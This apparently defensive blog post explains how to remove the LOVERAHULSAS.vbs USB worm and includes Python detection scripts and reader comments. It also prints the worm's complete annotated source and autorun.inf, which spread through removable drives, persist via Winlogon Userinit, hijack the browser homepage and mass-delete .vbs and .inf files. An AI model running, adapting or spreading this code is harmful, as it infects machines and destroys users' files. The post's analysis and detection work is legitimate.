The surprising thing I discovered while going through the source code is that this worm actually deletes a few other common threats that spread through pen drives. So was the intention of Rahul the Hacker good? But then why permanently set the homepage to a rogue link?
My antivirus was outdated and was not able to remove it.
- To remove the worm easily, log into Windows in safe mode. You can get to Windows safe mode by pressing the F8 key repeatedly while Windows 98 or XP boots.
- After logging into Windows in safe mode, open Task Manager by pressing Ctrl+Alt+Delete.
- Select Wscript.exe and click End Task.
- Search for and delete the files with the name "LOVERAHULSAS".
- After deleting the script file, make sure the source pen drive is formatted. Restart in normal mode.
After these steps you will be able to set the homepage to whatever you want.
The remaining traces of the worm can be removed by deleting the "RAHUL THE H@CkEr" entries with "HiJackThis_v2".
I recovered the entire source code of the worm after removing it; it is given below:
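The HijackThis entries mentioned above are the registry values the worm writes: the Winlogon Userinit command, the Internet Explorer Start Page and Window Title, and the Policies keys. The script below is an added example, not the blog author's code or the worm's. It parses a .reg export of the kind `reg export` produces (the sample export is constructed to look like an infected machine; the key names and worm strings are taken from the worm source on this page), separates the legitimate userinit.exe entry from the command the worm appended, and lists every value containing one of the worm's strings, so the persistence can be confirmed before the live hive is edited.

```python
"""Check a Windows registry export for the values LOVERAHULSAS.vbs writes.

Added example (not the post's or the worm's code). Parses a .reg fragment
for the Winlogon, Internet Explorer and Policies keys and reports the extra
command appended to Winlogon\\Userinit, a non-default Shell, and any value
holding one of the worm's strings.
"""
import re

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
IE_MAIN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main"
POLICY_SYSTEM_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"

# Strings the worm writes into the registry (taken from its source above).
WORM_INDICATORS = ("loverahulsas", "rahul the h@cker", "rahulhackingarticle.wetpaint.com")

# Constructed .reg export: what `reg export` would give on an infected host.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\WINDOWS\\system32\\wscript.exe C:\\WINDOWS\\system32\\LOVERAHULSAS.VBS"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.rahulhackingarticle.wetpaint.com/"
"Window Title"="RAHUL THE H@CkeR"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000000
"DisableRegistryTools"=dword:00000000
'''

_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s):
    """Undo .reg string escaping (backslash-backslash and backslash-quote)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for string and dword values."""
    reg, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            reg.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if current is None or not m:
            continue
        name, data = _unescape(m.group(1)), m.group(2)
        if data.startswith('"') and data.endswith('"'):
            reg[current][name] = _unescape(data[1:-1])
        elif data.lower().startswith("dword:"):
            reg[current][name] = int(data[6:], 16)
        else:
            reg[current][name] = data  # other value types are kept raw
    return reg


def check_winlogon(reg):
    """Split Userinit on commas: any entry other than userinit.exe is a hijack."""
    values = reg.get(WINLOGON_KEY, {})
    entries = [e.strip() for e in values.get("Userinit", "").split(",") if e.strip()]
    legit = [e for e in entries if e.lower().endswith("userinit.exe")]
    extra = [e for e in entries if e not in legit]
    return {
        "userinit_extra": extra,
        # Windows' default form is "<path>\userinit.exe," with a trailing comma.
        "userinit_clean": ",".join(legit) + "," if legit else "",
        "shell_ok": values.get("Shell", "explorer.exe").lower() == "explorer.exe",
    }


def find_indicators(reg):
    """Return (key, name, data) triples whose data contains a worm string."""
    hits = []
    for key, values in reg.items():
        for name, data in values.items():
            text = str(data).lower()
            if any(ind in text for ind in WORM_INDICATORS):
                hits.append((key, name, data))
    return hits


if __name__ == "__main__":
    reg = parse_reg_export(SAMPLE_REG_EXPORT)
    result = check_winlogon(reg)
    for cmd in result["userinit_extra"]:
        print("Userinit hijack:", cmd)
    print("Restore Userinit to:", result["userinit_clean"])
    for key, name, data in find_indicators(reg):
        print(f"Indicator in {key}\\{name}: {data}")
```

Run it against a real export with `reg export "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" winlogon.reg` and read the file into `parse_reg_export`; the `userinit_clean` value is what the Userinit entry should be restored to once the script file itself has been deleted, since removing the file first (as the comments below describe) leaves Windows trying to run a missing LOVERAHULSAS.vbs at every logon.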
Source of LOVERAHULSAS.vbs
'THIS IS AN ANTI VIRUS WHICH WILL WORK AS ##
'A VIRUS AND WILL ONLY REPAIR YOUR WINDOWS#
'AND WONT DO ANY HARM '
'HACK THE WORLD
'RAHUL THE H@CkEr
'@FB1-INNOVATIONS RULEZZZ
'LOVERAHULSAS@GMAIL.COM
'http://WWW.RAHULHACKINGARTICLE.WETPAINT.COM
Option Explicit
On Error Resume Next

Dim FOBJ,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root
Dim alert
Set FOBJ = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = FOBJ.GetSpecialFolder(0)
Set SystemDir = FOBJ.GetSpecialFolder(1)
' The script reads its own file into AllFile so it can write copies of itself later.
Set File = FOBJ.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = FOBJ.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
    AllFile = AllFile & ReadAll.readline
    AllFile = AllFile & vbcrlf
Loop
Count=Drv.DriveType

' Main loop: runs once when launched from a removable drive (DriveType 1),
' otherwise (e.g. the System32 copy started at logon) it loops forever with a 1 s sleep.
Do
    ' Drop a copy into the System32 folder and show the "anti-virus" message box.
    ' Note: Fso is never declared, so under Option Explicit the GetFile call fails
    ' and the error is swallowed by On Error Resume Next.
    If Not FOBJ.FileExists(SystemDir & "\LOVERAHULSAS.vbs") then
        set WriteAll = FOBJ.CreateTextFile(SystemDir & "\LOVERAHULSAS.vbs",2,true)
        WriteAll.Write AllFile
        WriteAll.close
        set WriteAll = Fso.GetFile(SystemDir & "\LOVERAHULSAS.vbs")
        WriteAll.Attributes = -1
        alert =MsgBox("THIS IS AN ANTI-VIRUS AND WILL HELP YOUR SYSTEM TO WORK PROPERLY", 4096,"RAHUL THE H@CkEr")
    End If
    ' Registry changes: IE window title and home page, re-enable Folder Options,
    ' Task Manager and registry tools (set to 0), and persistence through the
    ' Winlogon Userinit value so wscript.exe runs the System32 copy at every logon.
    Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","RAHUL THE H@CkeR"
    Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
    Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
    Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
    Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.rahulhackingarticle.wetpaint.com/"
    Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
    Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
        SystemDir & "\wscript.exe " & SystemDir & "\LOVERAHULSAS.VBS"
    For Each Drives In InDrive
        root = Drives.Path & "\"
        ' When started by autorun from a drive root, open that drive in Explorer
        ' so the user sees the folder they expected.
        If FOBJ.GetParentFolderName(WScript.ScriptFullName)=root Then
            Shells.Run "explorer.exe " & root
        End If
        Set folder=FOBJ.GetFolder(root)
        ' Remove two known removal scripts and every autorun* file in the drive root.
        Set Delete = FOBJ.DeleteFile(SystemDir & "\killvbs.vbs",true)
        Set Delete = FOBJ.DeleteFile(SystemDir & "\virusremoval.vbs",true)
        For Each files In folder.Files
            auto=Left(files.Name,7)
            If UCase(auto)=UCase("autorun") Then
                Set Delete = FOBJ.DeleteFile(root & files.Name,true)
            End If
        Next
        ' On fixed drives (DriveType 2) delete all .inf files in the root.
        If Drives.DriveType=2 Then
            delext "inf",Drives.Path & "\"
            delext "INF",Drives.Path & "\"
        End if
        If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
            If Drives.Path<> "A:" Then
                ' Delete other .vbs files and some other pen-drive worms' executables.
                delext "vbs",WinDir & "\"
                delext "vbs",Drives.Path & "\"
                If FOBJ.FileExists(Drives.Path & "\ravmon.exe") Then
                    Fso.DeleteFile(Drives.Path & "\ravmon.exe")
                End If
                If FOBJ.FileExists(Drives.Path & "\sxs.exe") Then
                    Fso.DeleteFile(Drives.Path & "\sxs.exe")
                End If
                If FOBJ.FileExists(Drives.Path & "\winfile.exe") Then
                    FOBJ.DeleteFile(Drives.Path & "\winfile.exe")
                End If
                If FOBJ.FileExists(Drives.Path & "\run.wsh") Then
                    FOBJ.DeleteFile(Drives.Path & "\run.wsh")
                End If
                ' On removable drives: copy itself to the root and write an autorun.inf
                ' that starts wscript.exe on the copy.
                If Drives.DriveType = 1 Then
                    If Drives.Path<>"A:" Then
                        If Not FOBJ.FileExists(Drives.Path & "\LOVERAHULSAS.vbs") Then
                            Set WriteAll=FOBJ.CreateTextFile(Drives.Path & "\LOVERAHULSAS.vbs",2,True)
                            WriteAll.Write AllFile
                            WriteAll.Close
                            Set WriteAll = FOBJ.GetFile(Drives.Path & "\LOVERAHULSAS.vbs")
                            WriteAll.Attributes = -1
                        End If
                        If FOBJ.FileExists(Drives.Path & "\autorun.inf") Or FOBJ.FileExists(Drives.Path & "\AUTORUN.INF") Then
                            Set Chg = FOBJ.GetFile(Drives.Path & "\autorun.inf")
                            Chg.Attributes = -8
                            Set WriteAll = FOBJ.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
                            WriteAll.writeline "[autorun]"
                            WriteAll.WriteLine "open=wscript.exe LOVERAHULSAS.vbs"
                            WriteAll.WriteLine "shell\open=Open"
                            WriteAll.WriteLine "shell\open\Command=wscript.exe LOVERAHULSAS.vbs"
                            WriteAll.Close
                            Set WriteAll = FOBJ.GetFile(Drives.Path & "\autorun.inf")
                            WriteAll.Attributes = -1
                        else
                            Set WriteAll = FOBJ.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
                            WriteAll.writeline "[autorun]"
                            WriteAll.WriteLine "open=wscript.exe LOVERAHULSAS.vbs"
                            WriteAll.WriteLine "shell\open=Open"
                            WriteAll.WriteLine "shell\open\Command=wscript.exe LOVERAHULSAS.vbs"
                            WriteAll.Close
                            Set WriteAll = FOBJ.GetFile(Drives.Path & "\autorun.inf")
                            WriteAll.Attributes = -1
                        End if
                    End If
                End If
            End if
        End If
    Next
    if Count <> 1 then
        Wscript.sleep 1000
    end if
loop while Count<>1

' Delete every file in SrchPath whose extension is File2Find, sparing VirusRemoval.vbs.
sub delext(File2Find, SrchPath)
    Dim oFileSys, oFolder, oFile,Cut,Delete
    Set oFileSys = CreateObject("Scripting.FileSystemObject")
    Set oFolder = oFileSys.GetFolder(SrchPath)
    For Each oFile In oFolder.Files
        Cut=Right(oFile.Name,3)
        If UCase(Cut)=UCase(file2find) Then
            If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
        End If
    Next
End sub
Content of autorun.inf
[autorun]
open=wscript.exe LOVERAHULSAS.vbs
shell\open=Open
shell\open\Command=wscript.exe LOVERAHULSAS.vbs
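The autorun.inf above is the whole spreading mechanism: Windows reads the `open=` and `shell\open\Command=` entries and runs wscript.exe on the script. The following is an added example, not code from the post or from the worm; it parses autorun.inf files and flags launch entries that invoke a script host or a script file, which is the pattern this worm (and the other pen-drive worms it deletes) relies on. The worm's own autorun.inf is reproduced from the post; the benign installer-CD one is constructed.

```python
"""Flag autorun.inf files that launch a script host instead of a program.

Added example, not from the post. Every command autorun can run (open=,
shellexecute=, shell\\...\\command=) is extracted and checked for Windows
Script Host (wscript.exe / cscript.exe) or a script file as the target.
"""

# Reproduced from the post: the autorun.inf the worm writes to each pen drive.
WORM_AUTORUN = """[autorun]
open=wscript.exe LOVERAHULSAS.vbs
shell\\open=Open
shell\\open\\Command=wscript.exe LOVERAHULSAS.vbs
"""

# Constructed benign example: a vendor CD that only launches its installer.
BENIGN_AUTORUN = """[autorun]
open=setup.exe
icon=setup.ico
label=Printer Driver CD
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "wscript", "cscript"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")


def parse_autorun(text):
    """Parse INI-style autorun.inf into {section: {key: value}} (keys lowercased)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_commands(sections):
    """Return every command the [autorun] section can execute."""
    auto = sections.get("autorun", {})
    cmds = []
    for key, value in auto.items():
        is_verb_cmd = key.startswith("shell\\") and key.endswith("\\command")
        if key in ("open", "shellexecute") or is_verb_cmd:
            cmds.append(value)
    return cmds


def assess_autorun(text):
    """Return {'launches': [...], 'suspicious': bool, 'reasons': [...]}."""
    reasons = []
    cmds = launch_commands(parse_autorun(text))
    for cmd in cmds:
        tokens = cmd.replace('"', "").split()
        if not tokens:
            continue
        # First token is the executable; strip any path before comparing.
        exe = tokens[0].rsplit("\\", 1)[-1].lower()
        if exe in SCRIPT_HOSTS:
            reasons.append(f"script host launched: {cmd}")
        if any(t.lower().endswith(SCRIPT_EXTS) for t in tokens):
            reasons.append(f"script file referenced: {cmd}")
    return {"launches": cmds, "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for label, content in (("worm", WORM_AUTORUN), ("benign", BENIGN_AUTORUN)):
        verdict = assess_autorun(content)
        print(label, "suspicious" if verdict["suspicious"] else "clean", verdict["reasons"])
```

A file like the worm's is only dangerous because AutoRun is honoured for removable drives; the standard mitigation on the Windows versions this post covers is the `NoDriveTypeAutoRun` policy value under `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`, set to 0xFF to disable AutoRun on all drive types, which removes the need to rely on spotting the file at all.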
8 comments:
Could you please tell me the language used for writing this code?
When I started in safe mode and pressed Ctrl+Alt+Del there was no Wscript.exe task running, and I searched my whole computer and there is no file with the name LOVERAHULSAS, and whenever I boot my computer I see a window: cannot find c:windows/system32/LOVERAHULSAS.vbs. Please help me, how could I fix it?
Please help me with this problem, I really got fed up with this......
@ Indra Teja
Just follow the steps after the step you tried. Use Hijack 2 to remove the entries. This will solve your problem.
Yeah, please tell me how you use Hijack 2 and what is it??
I cannot install anything; like my winmap player is not working, and I uninstalled it and again I tried to install it but I can't.
@ Indra Tej,
First get and install a good antivirus and run a full system scan to remove all viruses. If you can't even install an anti-virus, attach your hard disk to a system that has anti-virus installed and get it scanned.
For info about HijackThis, you can read the link below.
http://www.bleepingcomputer.com/tutorials/tutorial42.html
If you are not sure what you are doing, it might be better to contact a professional.